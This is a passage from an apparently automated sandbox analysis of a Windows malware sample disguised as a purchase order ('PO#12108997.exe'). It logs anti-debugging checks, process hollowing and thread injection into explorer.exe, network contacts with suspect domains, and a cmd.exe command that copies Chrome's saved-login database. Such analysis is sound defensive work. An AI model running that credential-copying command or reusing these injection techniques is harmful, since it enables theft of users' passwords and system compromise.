          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04ADA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A93D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B03D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A77D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A98EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A88E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A68794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO#12108997.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.10 80
          Source: C:\Windows\explorer.exeDomain query: www.tyz.world
          Source: C:\Windows\explorer.exeDomain query: www.madurababe.net
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: B20000
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 3968
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3968
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: explorer.exe, 00000005.00000000.340347852.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.308579342.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.273499880.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.279299320.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.299907153.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.316538894.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.291781655.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.273520311.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.308634959.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Users\user\Desktop\PO#12108997.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
